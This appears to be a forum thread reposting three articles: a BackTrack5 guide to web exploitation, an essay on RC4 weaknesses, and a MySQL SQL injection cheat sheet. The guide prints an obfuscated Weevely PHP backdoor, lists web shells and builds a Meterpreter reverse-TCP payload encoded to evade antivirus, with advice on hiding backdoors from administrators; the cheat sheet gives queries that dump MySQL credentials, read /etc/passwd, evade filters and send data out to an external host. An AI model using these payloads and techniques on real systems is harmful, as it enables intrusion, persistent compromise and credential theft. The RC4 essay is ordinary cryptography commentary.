google dorks which can come handy for pentesters gathering information. We can use the dorks for finding certain types of vulnerable servers or other information. For example, a google dork like “Microsoft-IIS/6.0? intitle:index.of” can be used to detect the server which is running Microsoft IIS 6.0. Another advantage of this is that it gives a little anonymity, as well as helping pen testers to attack or perform a VA with more precision. Xssed: Xssed.com is another website that contains a list of cross-vulnerable websites, submitted by various authors. Pentesters can search for their target in the xssed.com database or check for other information that can be helpful during the VA/PT. Revhosts: Revhosts is a project for Passive information Gathering. It’s written in Python and likewise helps pentesters to gather information (i.e., the host, VirtualHost, DNS entry, directories, mail address, subnet, etc.). This tool comes both in GUI and console. [h=2]Web Crawlers:[/h] The final category of web application analyses is the web crawler. The tool found in BT5 is called webshag, and it comes in both GUI and console based. Webshag can be used to scan a web server in HTTP or HTTPS, through a proxy and using HTTP authentication Webshag has options like port scan, gathering basic information, spider, fuzzing Downlink: S C R T :: Attack : Downloads : Webshag. [h=2]Vulnerability Assessment and exploitation:[/h] The vulnerability assessment stage is where we scan our target for any loopholes or bugs. Before doing a vulnerability assessment, gathering information about the target will be more helpful. The information gathering phase remains the key step before performing further attacks, simply because it makes the work easier. So, for example in the first stage: in using the CMS scanners like BlindElephant, we scanned and found the version of the application installed. Here it is: joomla. Now in the Vulnerability assessment stage, we used scanner like joomscan. Below is the image showing the vulnerability in a particular site. Usage: ./joomscan.pl –u Target.com : Furniture, Baby, Electronics, Toys,...: Target or IP address The joomscan scans all the plug-ins installed and gives details about the vulnerabilities. We can use this information for further attacks. SqlMap: SqlMap is another good tool in the vulnerability assessment category. This tool can test whether the target url is vulnerable or not. Below is the example, where the highlighted text tells us that the parameter “newId” is vulnerable. The usage is as follows: ./sqlmap.py –u target.com -f Fimap: fimap is a python- based tool which can be used to find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. More modules and functionalities are being added to this tool, making it even more powerful. Fimap also allows us to add our own payloads. Usage: fimap -u IANA — Example domains -U defines the target url To scan a list of url from a text file, the command would be fimap -m -l ‘/tmp/urlscan.txt’ -m is for mass scanning -l is for list Scan websites using google dorks .fimap.py -g -q ‘inurl:include.php’ -g for searching from google -q stands for the query which is to be searched in google. Fimap can exploit the vulnerable target and can also upload an interactive shell for more exploitation Xsser: Xsser is an automatic -framework- to detect, exploit and report XSS vulnerabilities. It comes with options for bypassing the filters and other mode of injection. Usage: ./XSSer.py -u "http://www.target.com" -g "Search.php?tfSearch="–referer"666.666.666.666?–user-agent"correctaudit" This tool gives information like attack url, browsers and the method of the attack. Once the vulnerable url is detected, we can open the url and check it to confirm. theHarvestor: theHarvester tool is used for gathering user names, their email accounts, hostnames/subdomains from public resources (like, for example, google, bing, etc.). This tool again helps the pentester during the initial stage of VA/PT. It can be found in the “Web open source assessment ” option under web vulnerability assessment. Usage: ./theHaervester.py –ld [target domain] –d [ data source] The domains and the emails related to the particular website are being extracted, which can help for further attacks or research about the target. Shodan: This is, again, another web-based assessment tool of particular usefulness for pentesters. It can be used to gather a range of intelligence about the target devices which are connected to the internet. We can, for example, search to see if any network devices like routers, Voip, Printers, cams etc. are in place. To search if any service is running in the domain, the syntax would be: Syntax: Hostname:target.com port:80,21,22 Or simply to find out the results about the hostname, then simply search for Syntax: Hostname:target.com W3af: W3af is auditing and web application attack tool. It’s basically divided into various modules like attack, audit, exploit, discovery, evasion, brute force, and mangle, all of which can be used accordingly. These modules in w3af comes with various sub modules like, for example, we can select sqli option in Audit module, assuming that we need to perform a particular type of auditing. The below diagram shows a brief flowchart of the target website and makes it’s more easy to understand. Once the scan is completed, the W3af framework shows detailed information about the vulnerabilities found in the target website which can be compromised accordingly for further exploitation. Once the vulnerability is found, we can configure the plugins in the “Exploit” tab and perform further attacks, which can help us to get a webshell in the target site. Another major advantage is W3af also comes with MSF for taking the attack to next level. The results can be exported to html format, also. [h=2]Maintaining Access:[/h] Once we have access to the target website, we need to maintain access for future use because we don’t want to be starting from square one again and again. In order to avoid this, we can upload the web shells or backdoors to the target website. And encoding your backdoor is also important, since it should not create noise once uploaded in the server. If it does, then the administrators can easily detect it and remove the backdoors. BT5 comes with few good options for uploading webshells. Weevely: Weevely is a stealthy PHP backdoor, designed to stay beneath the radar. It provides a telnet-like connection, using a dynamic probe of system like functions to bypass PHP security restrictions. Weevely seeks functions like system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()), using the functions enabled on a remote server. The below code is a sample code of the backdoor created by the weevely. eval(base64_decode(‘cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=’)); Usage: To create a backdoor. Weevely.py –g –o filename –p password This will create a backdoor with a specific name and will be password protected. Upload to the target server and access the backdoor using the following command: Usage: weevely.py –t –u http://Remote-IP/backdoor.php -p infosec Webshells: Here is a list of specific web shells which can be used. These are useful in various situations, such as if the web application has a vulnerability (like file upload) or any others that can help us to upload the backdoors. Depending on the website type (for example, if the website is coded in php), then use the php based backdoors. The following web shells available are simple-backdoor.php php-backdoor.php jsp-reverse.jsp cmdjsp.jsp cmd-asp-5.1.asp cmdasp.aspx perlcmd.cgi cfexec.cfm MsfPayload: Metasploit can be used to create backdoors which can then be used for maintaining access in the target server. This can be done with the help of msfpayload. The steps for creating backdoor in msfpayload are as follows: We need to select the payload which we are going to use to get a Meterpreter shell spawned via a reverse TCP connection. The command would be: msf > msfpayload windows/meterpreter/reverse_tcp This payload needs two parameters: LHOST (attackers IP address), and the LPORT for selecting the port that we are going to use. The “R” is then used to give the output file in RAW data format so that we can encode it later on. Msf > msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R This will create the payload but it has to be encoded in order to avoid AV detection. This can be done using the msfencode option. In order to do this, we need to pipe (“|”) the output generated by msfpayload to msfencode. Msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> infosec.exe -e can be used to specify the type of encoding needed. Here I am using shikata_ga_nai encoding and –t for the type of file extension. Here it’s an exe file. Below is the image of the list of encoders available in MSF. Conclusion: These are but a few methods followed while performing an exploitation of a web application. Once we get the information about our target, try to perform a vulnerability assessment in order to get information about the loopholes which can be used. Once this is done, exploit the vulnerabilities and if necessary, upload a backdoor. As I’ve said before, encode the backdoors in order to avoid detection. Hope this helps you in finding vulnerability, exploiting and how to maintain access in your target. Sursa: Web Analysis, Vulnerability Assessment and Exploitation using Backtrack5 | InfoSec Institute – IT Training and Information Security Resources

[h=3]What's the deal with RC4?[/h][h=2]Thursday, December 15, 2011 [/h] Jacob Appelbaum tweets: Does anyone have a good reading list on practically attacking RC4? I don't propose to give an exact answer to Jacob's question here, but his tweet caught my eye for a reason. You see, just the other week I advised implementers to avoid RC4 -- both because it's easy to misuse, and because it's has some real and theoretical flaws. But that doesn't mean any particular RC4 implementation is broken. Instead, I'd prefer you to view my advice as the crypto equivalent of "don't run with scissors", "don't run near the pool", or "don't run near the pool while carrying scissors". I don't know anyone who's actually lost an eye because they ignored these warnings, but I'll still yell this stuff at my kids. It's common sense. Still, that doesn't answer the burning question: how bad is RC4, really? RC4, the stream cipher for the rest of us First, some background. RC4 was invented in 1987 by Ron Rivest. It spent its first seven years as an RSA trade secret before it was eventually leaked to a public mailing list in 1994. The rest, as they say, is history. You could argue that RC4's popularity was inevitable. For one thing, it was already in widespread commercial use. It was fast in software, something that DES wasn't. More importantly, the scheme itself is dirt simple. You can fit the code for RC4 onto a T-shirt, with plenty of room left over for, well, another T-shirt. And don't forget that, once leaked, the 'alleged' RC4 was free. The scheme consists of two parts: a key scheduling algorithm (KSA), and a pseudo-random generator (PRG). To encrypt a message, you run the key through the key scheduler, which produces a scrambled array called the state vector. You then feed the state vector into the PRG, which continuously permutes it while outputting a series of bytes. You then XOR those 'keystream' bytes with your plaintext. RC4 is probably most famous for its (mis)use in 802.11 WEP. It's still used in WPA-TKIP (unsurprising, since TKIP is just a bandaid patch for WEP). But its use goes way beyond that. For one thing, it's a common ciphersuite for TLS, and as of a year or two ago it was even preferred by browsers like Chrome. Up until recently, Microsoft used it everywhere. Skype uses it to obfuscate (though not to encrypt) its communication protocol. It shows up in malware and a zillion crappy DRM packages. To make a long story short, you'll find RC4 anywhere the hardware was too weak, or the developers too lazy to use a better cipher. The plain stupid There are a few basic things you need to avoid when using any PRG-based stream cipher. These aren't specific to RC4, but for some reason they seem to crop up at a higher rate in RC4 implementations than with other ciphers. The big honking obvious one is that you can't re-use the same RC4 keystream to encrypt two different messages. I hope I don't need to go into the consequences, butthey're bad. Don't do it. You'd think this is so obvious that nobody could get it wrong, but that's exactly what Microsoft famously did back in 2005, encrypting different versions of a Word document with the same key. If you must use the same key for different messages, the solution is to combine the key with an Initialization Vector or 'nonce'. Unfortunately this can be problematic as well. Another big issue is ciphertext malleability. If you flip a bit in an RC4 ciphertext, you'll see the same bit flipped in the decrypted plaintext. This is awesome at parties. More to the point, it can lead to practical padding-oracle type attacks that totally compromise the security of your encryption.* The solution to the latter problem is simply to MAC your ciphertexts. Unfortunately, people don't use RC4 because they know what a MAC is -- they use RC4 because you can download the code from Wikipedia. So, again, I would say that this stuff tends to happen more than it should. Key Scheduling Leaving aside the stupid, the real problem with RC4 is the Key Scheduling Algorithm (KSA), which kind of sucks. Picture a brand new box of playing cards. Starting with the unshuffled deck, work systematically from top to bottom, swapping each card's position with another card in the deck. The position you're swapping to is determined by a few simple computations involving the original card's face value and the cryptographic key. Now do this with a stack of about five ordered decks and you've got the RC4 KSA. While this shuffle is thorough, the basic problem is that it isn't quite thorough enough. This leads to predictable patterns that show up in the first PRG output bytes. For example, Mantin and Shamir noted that the second output byte takes on the value '0' with about twice the probability it should. By itself that may not seem terribly useful, but for one thing: it's enough to practically determine whether an unknown algorithm is RC4, given about 128 keystreams on different (random) keys. From what I can tell, the first person to notice problems with KSA was Andrew Roos, who posted a paper to sci.crypt about a year after the leak. Aside from the fact that it was published on Usenet, Roos's result is notable for two reasons. First, he correctly identified use of concatenated IVs as a likely source of weakness in WEP implementations -- years before the FMS attack. Second, he gave recommendations that -- had they been followed -- would have prevented the whole thing. (Life lesson: don't publish important results in newsgroups.) FMS Roos's paper set the table for the most famous attack on RC4, and the one that people still associate with RC4, even though it's been improved upon substantially. This is, of course, the Fluhrer, Mantin and Shamir, or 'FMS' attack, which appeared in 2001. Just like Roos, FMS looked at the KSA and found it wanting -- specifically, they discovered that for certain weak keys, the first byte output by the PRG tends to be correlated to bytes of the key. These weak keys can be obtained by prependinga few chosen bytes (say, 3 of them) to an unknown, fixed, secret key. Given keystreams resulting from 60 such chosen keys, you can derive one byte of the secret portion of the key. A 16-byte key can therefore be computed from about 960 such keystreams. On the face of it this sounds pretty unlikely -- after all, how are you going to get an encryptor to prepend chosen bytes to their secret key. Fortunately the attack works fine even if the adversary just knows that the appropriate bytes were used. This works perfectly for implementations that prepend (or append) a known Initialization Vector to the WEP key. Simply by observing a few million IVs, an attacker can eventually collect enough keystreams to meet the FMS requirements. All of this would have be a historical footnote if it hadn't been for protocols like WEP, which (among its many problems) used a three-byte prepended IV. FMS was quickly demonstrated to work on WEP, then packaged into a neat tool and distributed. Klein, Dropping and Hashing There are two competing approaches to dealing with the FMS attack: Drop the first N bytes of the RC4 keystream, for values of N ranging from 256 to 3,072. Don't concatenate the IV to the key, hash the two together instead. The first option is sometimes referred to as RC4-drop[N], and the actual value of N has been subject to some debate. In 2006, Klein presented a super-charged variant of the FMS attack that reduced the number of needed IVs from millions down to about 25,000. More importantly, he showed that FMS-type attacks are still (borderline) viable even if you drop the first 256 bytes of the keystream. So 768 seems like a bare minimum to me, and some people will argue for much larger values. The second approach was adopted for WPA-TKIP, which was proposed as a band-aid replacement for WEP. TKIP was designed to support legacy WEP-capable devices that had internal RC4 hardware, but weren't powerful enough to handle AES. It made a bunch of positive changes to WEP (including adding a larger IV to prevent keystream reuse), but the most notable change was a new custom hash function that creates a per-packet key from an IV and secret key. As a hash function, the TKIP hash kind of stinks. For one thing, it can be inverted given only about 10 per-packet keys and about 2^32 computation (these days, a few minutes on a TI calculator). However, this isn't as big of a deal as it sounds: pre-image resistance isn't precisely a goal of the TKIP hash, since those per-packet keys themselves should themselves be hard to obtain. Nonetheless, I wouldn't recommend that you mess around with it. If you must use RC4, try a proper hash function. Or better yet, don't use RC4 at all. Distinguishers RC4 is just a PRG, and a PRG is secure if its output is indistinguishable from a stream of truly random bits -- to a 'reasonable' adversary who doesn't know the key.** Hence a great deal of RC4 research focuses on the quality of the cipher's PRG. So is RC4 a good pseudo-random generator? Meh. Given a mere 1.5GB of keystream data, Fluhrer and McGrew presented an algorithm that distinguishes RC4 from random. I already mentioned Mantin and Shamir who cranked this down to about 256 bytes (over various unknown, unrelated keys) by looking at the second output byte. Finally, Mantin noticed the presence of repeating patterns in RC4, which aren't simply dependent on the first few bytes of output, and can be used to distinguish RC4 given about 64MB of keystream. There are, of course, other distinguishing attacks. But does it matter? Well, sort of. Indistinguishability is an important characteristic of a pseudo-random generator. If we have it, then the security argument for RC4 as a stream cipher is very simple: to an adversary who can't distinguish the PRG, RC4 encryption is indistinguishable from a one-time pad. Unfortunately the converse isn't true. Just because RC4 output is distinguishable from random doesn't mean that there's a practical attack on the cipher. These results are important mostly because they illustrate the fundamental wonkiness of RC4, wonkiness that doesn't go away just because you drop the first 3,072 bytes. But they don't exactly give us a practical opening into the cipher itself. Yet. Ok, none of this was very helpful. I just want to know: can I use RC4? Great question. Look, the upshot is that RC4, if used as recommended (with hashed IVs and/or dropped output and MACs), is perfectly sufficient for securely encrypting messages. Today. The problem is, we never know what the future will bring. My advice? Don't run with scissors. You can lose an eye that way. Notes: * You might argue that RC4 implementations shouldn't use padding in the first place, since (unlike CBC mode encryption with a block cipher) messages don't need to be padded to a multiple of a block size. This is true -- however, I would note that 'padding oracle'-style attacks needn't rely specifically on padding. Padding is just one type of encoding that can leak useful information if used incorrectly. See Jager and Somorovsky's recent result on XML encryption for a great example of this. ** By reasonable, of course, we mean 'computationally limited'. This rules out attacks that require an unrealistically long time, quantum computing, or ESP. Posted by Matthew Green at 8:11 AM Sursa: A Few Thoughts on Cryptographic Engineering: What's the deal with RC4?

[h=5]Usefull Stuff For SQLI[/h] A handful of useful functions, syntaxes and queries for MySQL. Also knows as a MySQL Cheat Sheet. [h=4]chernabog[/h] Version: SELECT VERSION() SELECT @@version SELECT @@version_comment SELECT @@version_compile_machine SELECT @@version_compile_os Directories: SELECT @@basedir SELECT @@tmpdir SELECT @@datadir Users: SELECT USER() SELECT SYSTEM_USER() SELECT SESSION_USER() SELECT CURRENT_USER() Current Database: SELECT DATABASE() Concatenation: SELECT CONCAT('foo','.','bar'); #Returns: foo.bar SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Returns: Hello MySQL and hello world! Multi-Concat: #Stacks the row "foo" from the table "bar" together, using the separator "<br />". #Note: This operation can by default only grab 1024 bytes, and do not allow LIMIT. #The 1024 byte limit is stored in the @@group_concat_max_len variable. SELECT GROUP_CONCAT(foo SEPARATOR '<br />') FROM bar Better-Concat: #CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROUP_CONCAT(). #Which therefor allows you to concat strings together up to the @@max_allowed_packet size, #instead of @@group_concat_max_len. The default value for @@max_allowed_packet is currently set to #1048576 bytes, instead of @@group_concat_max_len's 1024. SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 0,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 1,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 2,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 3,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 4,1))) Change Collation: SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from any other collation. SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8. Wildcards in SELECT(s): SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all COLUMN(s) starting with "test". SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all COLUMN(s) ending with "test". Regular Expression in SELECT(s): #Returns all columns matching the regular expression. SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).*' SELECT Without Dublicates: SELECT DISTINCT foo FROM bar Counting Columns: SELECT COUNT(foo) FROM bar; #Returns the amount of rows "foo" from the table "bar". Get Amount of MySQL Users: SELECT COUNT(user) FROM mysql.user Get MySQL Users: SELECT user FROM mysql.user Get MySQL User Privileges: SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges Get MySQL User Privileges on Different Databases: SELECT grantee,table_schema,privilege_type FROM information_schema.schema_privileges Get MySQL User Privileges on Different Columns: SELECT table_schema,table_name,column_name,privilege_type FROM information_schema.column_privileges Get MySQL User Credentials & Privileges: SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Update_priv,Delete_priv, Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv, File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv, Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv, Repl_client_priv) FROM mysql.user Get MySQL DBA Accounts: SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges WHERE privilege_type='SUPER' SELECT host,user FROM mysql.user WHERE Super_priv='Y' Get Databases: SELECT schema_name FROM information_schema.schemata SELECT DISTINCT db FROM mysql.db SELECT DISTINCT table_schema FROM information_schema.columns SELECT DISTINCT table_schema FROM information_schema.tables Get Databases & Tables: SELECT table_schema,table_name FROM information_schema.tables SELECT DISTINCT table_schema,table_name FROM information_schema.columns Get Databases, Tables & Columns: SELECT table_schema,table_name,column_name FROM information_schema.columns SELECT A Certain Row: SELECT foo FROM bar LIMIT 0,1; #Returns row 0. SELECT foo FROM bar LIMIT 1,1; #Returns row 1. ... SELECT foo FROM bar LIMIT N,1; #Returns row N. Benchmark (Heavy Query): #Performs an MD5 calculation of "1" for 10000 times. SELECT BENCHMARK(10000,MD5(1)) Sleep: #Works only in MySQL 5 and above. #Sleeps for 5 seconds, returns 0 on success. SELECT SLEEP(5) Conversion (Casting): SELECT CAST('1' AS UNSIGNED INTEGER); #Returns: 1 SELECT CAST('65' AS CHAR); #Returns: A Substring: SELECT SUBSTR('foobar',1,3); #Returns: foo Hexadecimal Evasion: SELECT 0x41424344; #Returns: ABCD SELECT 0x2E; #Returns: . SELECT 0x3A; #Returns: : ASCII to Number: SELECT ASCII('A'); #Returns: 65 Number to ASCII: SELECT CHAR(65); #Returns: A SELECT CHAR(89); #Returns: Y SELECT CHAR(116,101,115,116); #Returns: test If Statement: #Returns 1 if the database is running MySQL 5. SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0); #Returns 1 if the database is running MySQL 4. SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0); Case Statement: #Returns 1 if the database is running MySQL 5. SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=53) THEN 1 ELSE 0 END #Returns 1 if the database is running MySQL 4. SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=52) THEN 1 ELSE 0 END Read File(s): #Requires you to have the File_priv in mysql.user. On error this statement will return NULL. SELECT LOAD_FILE('/etc/passwd') Write File(s): #You must use quotes on the filename! SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt' SELECT IF((SELECT NULL INTO DUMPFILE '/tmp/test.txt')=NULL,NULL,'Hello World') Logical Operator(s): AND, &&; #The AND operator have && as an alternative syntax. OR, ||; #The OR operator have || as an alternative syntax. NOT, !; #The NOT operator have ! as an alternative syntax. XOR; #The XOR operator got no alternative syntax. Fuzzy Code Comment: #Code within /*! are getting executed by MySQL. Additional /*! can be used instead of space as evasion. SELECT/*!CONCAT_WS(0x3A,user,host,password)/*!FROM/*!mysql.user*/ Comments: SELECT foo, bar FROM foo.bar-- Single line comment SELECT foo, bar FROM foo.bar/* Multi line comment */ SELECT foo, bar FROM foo.bar# Single line comment SELECT foo, bar FROM foo.bar;%00 Batched query with additional NULL-byte. It do not work together with PHP though. A few evasions/methods to use between your MySQL statements: CR (%0D); #Carrier Return. LF (%0A); #Line Feed. Tab (%09); #The Tab-key. Space (%20); #Most commonly used. You know what a space is. Multiline Comment (/**/); #Well, as the name says. Fuzzy Comment (/*!); #Be sure to end your query with (*/) Parenthesis, ( and ); #Can also be used as separators when used right. Parenthesis instead of space: #As said two lines above, the use of parenthesis can be used as a separator. SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2)) Auto-Casting to Right Collation: SELECT UNHEX(HEX(USER())); #UNHEX() Converts the hexadecimal value(s) to the current collation. DNS Requests (OOB (Out-Of-Band)): #For more information check this. SELECT YourQuery INTO OUTFILE ‘\\\\www.your.host.com\\?file_to_save_as.txt’ Command Execution: #If you're on a MySQL 4.X server, it's possible to execute OS commands as long as you're DBA. #It can be done if you're able to upload a shared object into /usr/lib. #The file extension is .so, and it must contain an "User Defined Function", UDF. #Get raptor_udf.c, it's the source-code for just that feature. #Remember to compile it for the right CPU Architecture. #The CPU architecture can be resolved by this query: SELECT @@version_machine; <blockquote>A couple of useful blind queries to fingerprint the database. All of these return either True or False, as in, you either get a result or you don't.</blockquote> Version: SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53; #MySQL 5 SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52; #MySQL 4 Running as root: SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=UNHEX(HEX(0x726F6F74)),1,0)=1 Got File_priv: SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user WHERE (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37))) LIMIT 0,1)=CHAR(89),1,0)=1 Got Super_priv (Are we DBA): SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql.user WHERE (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37))) LIMIT 0,1)=CHAR(89),1,0)=1 Can MySQL Sleep: #This query will return True and should take above 1 second to execute. If it's a success. SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1 Can MySQL Benchmark: SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1 Are we on *NIX: SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47 Are we on Windows: SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=58,1,0)=1 Do a certain column exist: SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE column_name LIKE 'your_column' LIMIT 0,1)>0 Do a certain table exist: SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.columns WHERE table_name LIKE 'your_table' LIMIT 0,1)>0 SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_name LIKE 'your_table' LIMIT 0,1)>0 Do a certain database exist: SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.columns WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0 SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.tables WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0 SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information_schema.schemata WHERE schema_name LIKE 'your_database' LIMIT 0,1)>0 SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db WHERE db LIKE 'your_database' LIMIT 0,1)>0 from:h.ackack(dot)net Sursa: Usefull Stuff For SQLI

Da... Ce sa faca omu la 06:30 AM cand nu are somn? Postez de azi-noapte